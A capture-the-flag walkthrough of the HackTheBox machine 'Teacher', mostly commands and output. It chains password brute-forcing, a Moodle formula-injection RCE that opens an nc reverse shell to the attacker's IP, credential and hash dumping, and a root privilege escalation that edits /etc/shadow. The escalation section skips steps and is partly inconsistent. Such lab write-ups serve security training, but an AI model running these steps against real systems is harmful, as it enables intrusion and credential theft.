TEACHER (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.153
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-20 22:42 EDT
Nmap scan report for 10.10.10.153
Host is up (0.14s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=4/20%OT=80%CT=1%CU=43644%PV=Y%DS=2%DC=T%G=Y%TM=5CBBD8A
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops

TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 135.91 ms 10.10.14.1
2 136.00 ms 10.10.10.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.22 seconds

root@kali:~/Downloads# gobuster -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.153/

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.153/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/04/20 22:49:04 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/js (Status: 301)
/manual (Status: 301)
/moodle (Status: 301)
/phpmyadmin (Status: 403)
/server-status (Status: 403)
=====================================================
2019/04/20 22:50:09 Finished
=====================================================

root@kali:~/Downloads/10.10.10.153# wget http://10.10.10.153/images/5.png
–2019-04-20 22:50:48– http://10.10.10.153/images/5.png
Connecting to 10.10.10.153:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 200 [image/png]
Saving to: ‘5.png’

5.png 100%[=======================================================================>] 200 –.-KB/s in 0s

2019-04-20 22:50:48 (42.6 MB/s) – ‘5.png’ saved [200/200]

root@kali:~/Downloads/10.10.10.153# cat 5.png
Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni

now try to access

http://10.10.10.153/moodle/login/index.php

and put cred anything

and intercept the traffic

POST /moodle/login/index.php HTTP/1.1
Host: 10.10.10.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.153/moodle/login/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Cookie: MoodleSession=ck6j7ier0luqubelgq4s4bfvq1
Connection: close
Upgrade-Insecure-Requests: 1

anchor=&username=user&password=pws

and in response we get

HTTP/1.1 303 See Other
Date: Sun, 21 Apr 2019 02:50:36 GMT
Server: Apache/2.4.25 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://10.10.10.153/moodle/login/index.php
Content-Language: en
Content-Length: 440
Connection: close
Content-Type: text/html; charset=utf-8

root@kali:~/Downloads/10.10.10.153# wfuzz -w /usr/share/wordlists/SecLists/Fuzzing/alphanum-case-extra.txt -L -d “anchor=&username=giovanni&password=Th4C00lTheachaFUZZ” –hw 1224 http://10.10.10.153/moodle/login/index.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information.

********************************************************
* Wfuzz 2.2.11 – The Web Fuzzer *
********************************************************

Target: http://10.10.10.153/moodle/login/index.php
Total requests: 95

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000003: C=200 296 L 1257 W 27569 Ch “#”

as from the image above we get the cred just add #

Username : Giovanni
passsword : Th4C00lTheacha#

and we are in

now refer this url

https://blog.ripstech.com/2018/moodle-remote-code-execution/

click on dashboard -> Algebra -> click on hacked quizz -> click on edit quiz -> Click on Add button on the right side and select a new question .

Select Calculated as question type and Add, then fill all fields and in formula

formula : 1?>

click save and click next

root@kali:~/Downloads/10.10.10.153# nc -lvnp 4444
listening on [any] 4444 …

now on browser refresh the page and capture the request on burp here we add first we add &0=(ping -c 1 10.10.14.2)

and on terminal we listner

root@kali:~/htb/teacher# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
09:23:53.098921 IP 10.10.10.153 > kali: ICMP echo request, id 903, seq 1, length 64
09:23:53.098931 IP kali > 10.10.10.153: ICMP echo reply, id 903, seq 1, length 64
09:23:53.176647 IP 10.10.10.153 > kali: ICMP echo request, id 905, seq 1, length 64
09:23:53.176657 IP kali > 10.10.10.153: ICMP echo reply, id 905, seq 1, length 64

now we add this

&0=(nc 10.10.14.2 4444 -e /bin/bash) and url encode only the value and we click go and ge the shell

GET /moodle/question/question.php?returnurl=%2Fquestion%2Fedit.php%3Fcmid%3D7&appendqnumstring&scrollpos=0&id=14&wizardnow=datasetitems&cmid=7&0=(nc+10.10.14.2+4444+-e+/bin/bash) HTTP/1.1
Host: 10.10.10.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: MoodleSession=4tlauc5mujabto3220adb7gu14; MOODLEID1_=%259C8vu%25EA%258F%25FB%25A4
Connection: close
Upgrade-Insecure-Requests: 1

and click on go and we get the shell

root@kali:~/Downloads/10.10.10.153# nc -lvnp 4444
listening on [any] 4444 …
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.153] 57962

python -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@teacher:/var/www/html/moodle/question$

press ctrl +z

root@kali:~# stty raw -echo

now press fg and then enter we get the shell back +

and we get the shell back

www-data@teacher:/var/www/html/moodle/question$ cd ..
cd ..
www-data@teacher:/var/www/html/moodle$ cat config.php
cat config.php
dbtype = ‘mariadb’;
$CFG->dblibrary = ‘native’;
$CFG->dbhost = ‘localhost’;
$CFG->dbname = ‘moodle’;
$CFG->dbuser = ‘root’;
$CFG->dbpass = ‘Welkom1!’;
$CFG->prefix = ‘mdl_’;
$CFG->dboptions = array (
‘dbpersist’ => 0,
‘dbport’ => 3306,
‘dbsocket’ => ”,
‘dbcollation’ => ‘utf8mb4_unicode_ci’,
);

$CFG->wwwroot = ‘http://10.10.10.153/moodle’;
$CFG->dataroot = ‘/var/www/moodledata’;
$CFG->admin = ‘admin’;

$CFG->directorypermissions = 0777;

require_once(__DIR__ . ‘/lib/setup.php’);

// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!

we get the cred

now

www-data@teacher:/var/www/html/moodle$ mysql -u root -pWelkom1! -D moodle
mysql -u root -pWelkom1! -D moodle
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 408
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

MariaDB [moodle]>

MariaDB [moodle]> show databases;
show databases;
+——————–+
| Database |
+——————–+
| information_schema |
| moodle |
| mysql |
| performance_schema |
| phpmyadmin |
+——————–+
5 rows in set (0.00 sec)

MariaDB [moodle]> SHOW TABLES;
SHOW TABLES;
+———————————-+
| Tables_in_moodle |
+———————————-+
| mdl_analytics_indicator_calc |
| mdl_analytics_models |
| mdl_analytics_models_log |
| mdl_analytics_predict_samples |
| mdl_analytics_prediction_actions |
| mdl_analytics_predictions |
| mdl_analytics_train_samples |
| mdl_analytics_used_analysables |
| mdl_analytics_used_files |
| mdl_assign |
| mdl_assign_grades |
| mdl_assign_overrides |
| mdl_assign_plugin_config |
| mdl_assign_submission |
| mdl_assign_user_flags |
| mdl_assign_user_mapping |
| mdl_assignfeedback_comments |
| mdl_assignfeedback_editpdf_annot |
| mdl_assignfeedback_editpdf_cmnt |
| mdl_assignfeedback_editpdf_queue |
| mdl_assignfeedback_editpdf_quick |
| mdl_assignfeedback_file |
| mdl_assignment |
| mdl_assignment_submissions |
| mdl_assignment_upgrade |
| mdl_assignsubmission_file |
| mdl_assignsubmission_onlinetext |
| mdl_auth_oauth2_linked_login |
| mdl_backup_controllers |
| mdl_backup_courses |
| mdl_backup_logs |
| mdl_badge |
| mdl_badge_backpack |
| mdl_badge_criteria |
| mdl_badge_criteria_met |
| mdl_badge_criteria_param |
| mdl_badge_external |
| mdl_badge_issued |
| mdl_badge_manual_award |
| mdl_block |
| mdl_block_community |
| mdl_block_instances |
| mdl_block_positions |
| mdl_block_recent_activity |
| mdl_block_rss_client |
| mdl_blog_association |
| mdl_blog_external |
| mdl_book |
| mdl_book_chapters |
| mdl_cache_filters |
| mdl_cache_flags |
| mdl_capabilities |
| mdl_chat |
| mdl_chat_messages |
| mdl_chat_messages_current |
| mdl_chat_users |
| mdl_choice |
| mdl_choice_answers |
| mdl_choice_options |
| mdl_cohort |
| mdl_cohort_members |
| mdl_comments |
| mdl_competency |
| mdl_competency_coursecomp |
| mdl_competency_coursecompsetting |
| mdl_competency_evidence |
| mdl_competency_framework |
| mdl_competency_modulecomp |
| mdl_competency_plan |
| mdl_competency_plancomp |
| mdl_competency_relatedcomp |
| mdl_competency_template |
| mdl_competency_templatecohort |
| mdl_competency_templatecomp |
| mdl_competency_usercomp |
| mdl_competency_usercompcourse |
| mdl_competency_usercompplan |
| mdl_competency_userevidence |
| mdl_competency_userevidencecomp |
| mdl_config |
| mdl_config_log |
| mdl_config_plugins |
| mdl_context |
| mdl_context_temp |
| mdl_course |
| mdl_course_categories |
| mdl_course_completion_aggr_methd |
| mdl_course_completion_crit_compl |
| mdl_course_completion_criteria |
| mdl_course_completion_defaults |
| mdl_course_completions |
| mdl_course_format_options |
| mdl_course_modules |
| mdl_course_modules_completion |
| mdl_course_published |
| mdl_course_request |
| mdl_course_sections |
| mdl_data |
| mdl_data_content |
| mdl_data_fields |
| mdl_data_records |
| mdl_editor_atto_autosave |
| mdl_enrol |
| mdl_enrol_flatfile |
| mdl_enrol_lti_lti2_consumer |
| mdl_enrol_lti_lti2_context |
| mdl_enrol_lti_lti2_nonce |
| mdl_enrol_lti_lti2_resource_link |
| mdl_enrol_lti_lti2_share_key |
| mdl_enrol_lti_lti2_tool_proxy |
| mdl_enrol_lti_lti2_user_result |
| mdl_enrol_lti_tool_consumer_map |
| mdl_enrol_lti_tools |
| mdl_enrol_lti_users |
| mdl_enrol_paypal |
| mdl_event |
| mdl_event_subscriptions |
| mdl_events_handlers |
| mdl_events_queue |
| mdl_events_queue_handlers |
| mdl_external_functions |
| mdl_external_services |
| mdl_external_services_functions |
| mdl_external_services_users |
| mdl_external_tokens |
| mdl_feedback |
| mdl_feedback_completed |
| mdl_feedback_completedtmp |
| mdl_feedback_item |
| mdl_feedback_sitecourse_map |
| mdl_feedback_template |
| mdl_feedback_value |
| mdl_feedback_valuetmp |
| mdl_file_conversion |
| mdl_files |
| mdl_files_reference |
| mdl_filter_active |
| mdl_filter_config |
| mdl_folder |
| mdl_forum |
| mdl_forum_digests |
| mdl_forum_discussion_subs |
| mdl_forum_discussions |
| mdl_forum_posts |
| mdl_forum_queue |
| mdl_forum_read |
| mdl_forum_subscriptions |
| mdl_forum_track_prefs |
| mdl_glossary |
| mdl_glossary_alias |
| mdl_glossary_categories |
| mdl_glossary_entries |
| mdl_glossary_entries_categories |
| mdl_glossary_formats |
| mdl_grade_categories |
| mdl_grade_categories_history |
| mdl_grade_grades |
| mdl_grade_grades_history |
| mdl_grade_import_newitem |
| mdl_grade_import_values |
| mdl_grade_items |
| mdl_grade_items_history |
| mdl_grade_letters |
| mdl_grade_outcomes |
| mdl_grade_outcomes_courses |
| mdl_grade_outcomes_history |
| mdl_grade_settings |
| mdl_grading_areas |
| mdl_grading_definitions |
| mdl_grading_instances |
| mdl_gradingform_guide_comments |
| mdl_gradingform_guide_criteria |
| mdl_gradingform_guide_fillings |
| mdl_gradingform_rubric_criteria |
| mdl_gradingform_rubric_fillings |
| mdl_gradingform_rubric_levels |
| mdl_groupings |
| mdl_groupings_groups |
| mdl_groups |
| mdl_groups_members |
| mdl_imscp |
| mdl_label |
| mdl_lesson |
| mdl_lesson_answers |
| mdl_lesson_attempts |
| mdl_lesson_branch |
| mdl_lesson_grades |
| mdl_lesson_overrides |
| mdl_lesson_pages |
| mdl_lesson_timer |
| mdl_license |
| mdl_lock_db |
| mdl_log |
| mdl_log_display |
| mdl_log_queries |
| mdl_logstore_standard_log |
| mdl_lti |
| mdl_lti_submission |
| mdl_lti_tool_proxies |
| mdl_lti_tool_settings |
| mdl_lti_types |
| mdl_lti_types_config |
| mdl_message |
| mdl_message_airnotifier_devices |
| mdl_message_contacts |
| mdl_message_popup |
| mdl_message_processors |
| mdl_message_providers |
| mdl_message_read |
| mdl_message_working |
| mdl_messageinbound_datakeys |
| mdl_messageinbound_handlers |
| mdl_messageinbound_messagelist |
| mdl_mnet_application |
| mdl_mnet_host |
| mdl_mnet_host2service |
| mdl_mnet_log |
| mdl_mnet_remote_rpc |
| mdl_mnet_remote_service2rpc |
| mdl_mnet_rpc |
| mdl_mnet_service |
| mdl_mnet_service2rpc |
| mdl_mnet_session |
| mdl_mnet_sso_access_control |
| mdl_mnetservice_enrol_courses |
| mdl_mnetservice_enrol_enrolments |
| mdl_modules |
| mdl_my_pages |
| mdl_oauth2_endpoint |
| mdl_oauth2_issuer |
| mdl_oauth2_system_account |
| mdl_oauth2_user_field_mapping |
| mdl_page |
| mdl_portfolio_instance |
| mdl_portfolio_instance_config |
| mdl_portfolio_instance_user |
| mdl_portfolio_log |
| mdl_portfolio_mahara_queue |
| mdl_portfolio_tempdata |
| mdl_post |
| mdl_profiling |
| mdl_qtype_ddimageortext |
| mdl_qtype_ddimageortext_drags |
| mdl_qtype_ddimageortext_drops |
| mdl_qtype_ddmarker |
| mdl_qtype_ddmarker_drags |
| mdl_qtype_ddmarker_drops |
| mdl_qtype_essay_options |
| mdl_qtype_match_options |
| mdl_qtype_match_subquestions |
| mdl_qtype_multichoice_options |
| mdl_qtype_randomsamatch_options |
| mdl_qtype_shortanswer_options |
| mdl_question |
| mdl_question_answers |
| mdl_question_attempt_step_data |
| mdl_question_attempt_steps |
| mdl_question_attempts |
| mdl_question_calculated |
| mdl_question_calculated_options |
| mdl_question_categories |
| mdl_question_dataset_definitions |
| mdl_question_dataset_items |
| mdl_question_datasets |
| mdl_question_ddwtos |
| mdl_question_gapselect |
| mdl_question_hints |
| mdl_question_multianswer |
| mdl_question_numerical |
| mdl_question_numerical_options |
| mdl_question_numerical_units |
| mdl_question_response_analysis |
| mdl_question_response_count |
| mdl_question_statistics |
| mdl_question_truefalse |
| mdl_question_usages |
| mdl_quiz |
| mdl_quiz_attempts |
| mdl_quiz_feedback |
| mdl_quiz_grades |
| mdl_quiz_overrides |
| mdl_quiz_overview_regrades |
| mdl_quiz_reports |
| mdl_quiz_sections |
| mdl_quiz_slots |
| mdl_quiz_statistics |
| mdl_rating |
| mdl_registration_hubs |
| mdl_repository |
| mdl_repository_instance_config |
| mdl_repository_instances |
| mdl_repository_onedrive_access |
| mdl_resource |
| mdl_resource_old |
| mdl_role |
| mdl_role_allow_assign |
| mdl_role_allow_override |
| mdl_role_allow_switch |
| mdl_role_assignments |
| mdl_role_capabilities |
| mdl_role_context_levels |
| mdl_role_names |
| mdl_role_sortorder |
| mdl_scale |
| mdl_scale_history |
| mdl_scorm |
| mdl_scorm_aicc_session |
| mdl_scorm_scoes |
| mdl_scorm_scoes_data |
| mdl_scorm_scoes_track |
| mdl_scorm_seq_mapinfo |
| mdl_scorm_seq_objective |
| mdl_scorm_seq_rolluprule |
| mdl_scorm_seq_rolluprulecond |
| mdl_scorm_seq_rulecond |
| mdl_scorm_seq_ruleconds |
| mdl_search_index_requests |
| mdl_sessions |
| mdl_stats_daily |
| mdl_stats_monthly |
| mdl_stats_user_daily |
| mdl_stats_user_monthly |
| mdl_stats_user_weekly |
| mdl_stats_weekly |
| mdl_survey |
| mdl_survey_analysis |
| mdl_survey_answers |
| mdl_survey_questions |
| mdl_tag |
| mdl_tag_area |
| mdl_tag_coll |
| mdl_tag_correlation |
| mdl_tag_instance |
| mdl_task_adhoc |
| mdl_task_scheduled |
| mdl_tool_cohortroles |
| mdl_tool_customlang |
| mdl_tool_customlang_components |
| mdl_tool_monitor_events |
| mdl_tool_monitor_history |
| mdl_tool_monitor_rules |
| mdl_tool_monitor_subscriptions |
| mdl_tool_recyclebin_category |
| mdl_tool_recyclebin_course |
| mdl_tool_usertours_steps |
| mdl_tool_usertours_tours |
| mdl_upgrade_log |
| mdl_url |
| mdl_user |
| mdl_user_devices |
| mdl_user_enrolments |
| mdl_user_info_category |
| mdl_user_info_data |
| mdl_user_info_field |
| mdl_user_lastaccess |
| mdl_user_password_history |
| mdl_user_password_resets |
| mdl_user_preferences |
| mdl_user_private_key |
| mdl_wiki |
| mdl_wiki_links |
| mdl_wiki_locks |
| mdl_wiki_pages |
| mdl_wiki_subwikis |
| mdl_wiki_synonyms |
| mdl_wiki_versions |
| mdl_workshop |
| mdl_workshop_aggregations |
| mdl_workshop_assessments |
| mdl_workshop_assessments_old |
| mdl_workshop_comments_old |
| mdl_workshop_elements_old |
| mdl_workshop_grades |
| mdl_workshop_grades_old |
| mdl_workshop_old |
| mdl_workshop_rubrics_old |
| mdl_workshop_stockcomments_old |
| mdl_workshop_submissions |
| mdl_workshop_submissions_old |
| mdl_workshopallocation_scheduled |
| mdl_workshopeval_best_settings |
| mdl_workshopform_accumulative |
| mdl_workshopform_comments |
| mdl_workshopform_numerrors |
| mdl_workshopform_numerrors_map |
| mdl_workshopform_rubric |
| mdl_workshopform_rubric_config |
| mdl_workshopform_rubric_levels |
+———————————-+
388 rows in set (0.01 sec)

MariaDB [moodle]> SELECT username,password FROM mdl_user;
SELECT username,password FROM mdl_user;
+————-+————————————————————–+
| username | password |
+————-+————————————————————–+
| guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af |
+————-+————————————————————–+
4 rows in set (0.00 sec)

so Giovannibak looks like the old backup of giovanni password and from its length it looks like md5 hash which can be easily decrypted on decrypting I got
password : expelled you can decrypt it on web from any website

now switch the user

www-data@teacher:/var/www/html/moodle/question$ su giovanni
su giovanni
Password: expelled

giovanni@teacher:/var/www/html/moodle/question$

giovanni@teacher:/var/www/html/moodle/question$ id
id
uid=1000(giovanni) gid=1000(giovanni) groups=1000(giovanni)

giovanni@teacher:/var/www/html/moodle/question$ cd /home
cd /home

giovanni@teacher:/home$ ls -lrt
ls -lrt
total 4
drwxr-x— 4 giovanni giovanni 4096 Nov 4 19:47 giovanni

giovanni@teacher:/home$ cd giovanni
cd giovanni

giovanni@teacher:~$ cat user.txt
cat user.txt
fa9ae1874625XXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation
After Enumeration I found an interesting process which is running as root /bin/bash /usr/bin/backup.sh

Content of backup.sh file

#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

The process is running and backing up content of courses directory content in every 30 seconds and saving it inside tmp so i tried something that i found in a previous machine “JOKER”

We know that it is backing up the data so i just made a soft link to /root but before that make backup of the directory i.e.,

giovanni@teacher:~$ cd work
cd work

www-data@teacher:/home/giovanni/work$ cat /etc/shadow
root:$6$bumbaclart$GPxFSv6bet2v27jgIKP9ur4LQqI7U2PmNzwX7BGXdXDS2tOYJF8Nn/Gm41G5CbHJ3nIF5uHa2aYhcvVNEO3Ts1:17709:0:99999:7:::
daemon:*:17708:0:99999:7:::
bin:*:17708:0:99999:7:::
sys:*:17708:0:99999:7:::
sync:*:17708:0:99999:7:::
games:*:17708:0:99999:7:::
man:*:17708:0:99999:7:::
lp:*:17708:0:99999:7:::
mail:*:17708:0:99999:7:::
news:*:17708:0:99999:7:::
uucp:*:17708:0:99999:7:::
proxy:*:17708:0:99999:7:::
www-data:*:17708:0:99999:7:::
backup:*:17708:0:99999:7:::
list:*:17708:0:99999:7:::
irc:*:17708:0:99999:7:::
gnats:*:17708:0:99999:7:::
nobody:*:17708:0:99999:7:::
systemd-timesync:*:17708:0:99999:7:::
systemd-network:*:17708:0:99999:7:::
systemd-resolve:*:17708:0:99999:7:::
systemd-bus-proxy:*:17708:0:99999:7:::
_apt:*:17708:0:99999:7:::
messagebus:*:17708:0:99999:7:::
sshd:*:17708:0:99999:7:::
mysql:!:17708:0:99999:7:::
giovanni:$6$RiDoH4VN$WamVNCkuoZyN1uM6hmyKKt6GwGWAamiQM3SYCrr5lmUYnmV7vpBNkYZCHqjh7UDtsdF8NbGjM7dJPIsxeFkrx0:17709:0:99999:7:::

giovanni@teacher:~/work$ cat /etc/shadow | grep giovanni
cat /etc/shadow | grep giovanni
giovanni:$6$RiDoH4VN$WamVNCkuoZyN1uM6hmyKKt6GwGWAamiQM3SYCrr5lmUYnmV7vpBNkYZCHqjh7UDtsdF8NbGjM7dJPIsxeFkrx0:17709:0:99999:7:::

modify the shadow file and paste the above hash value in root

$6$RiDoH4VN$WamVNCkuoZyN1uM6hmyKKt6GwGWAamiQM3SYCrr5lmUYnmV7vpBNkYZCHqjh7UDtsdF8NbGjM7dJPIsxeFkrx0

and it become like

root:$6$RiDoH4VN$WamVNCkuoZyN1uM6hmyKKt6GwGWAamiQM3SYCrr5lmUYnmV7vpBNkYZCHqjh7UDtsdF8NbGjM7dJPIsxeFkrx0:17709:0:99999:7:::

giovanni@teacher:~/work$ su root

password : expelled

root@teacher:/home/giovanni/work$ cd /root

root@teacher:/root$ cat root.txt
4f3a83b42acXXXXXXXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT

Related Posts

COMMENTS

Leave a Reply

Your email address will not be published. Required fields are marked *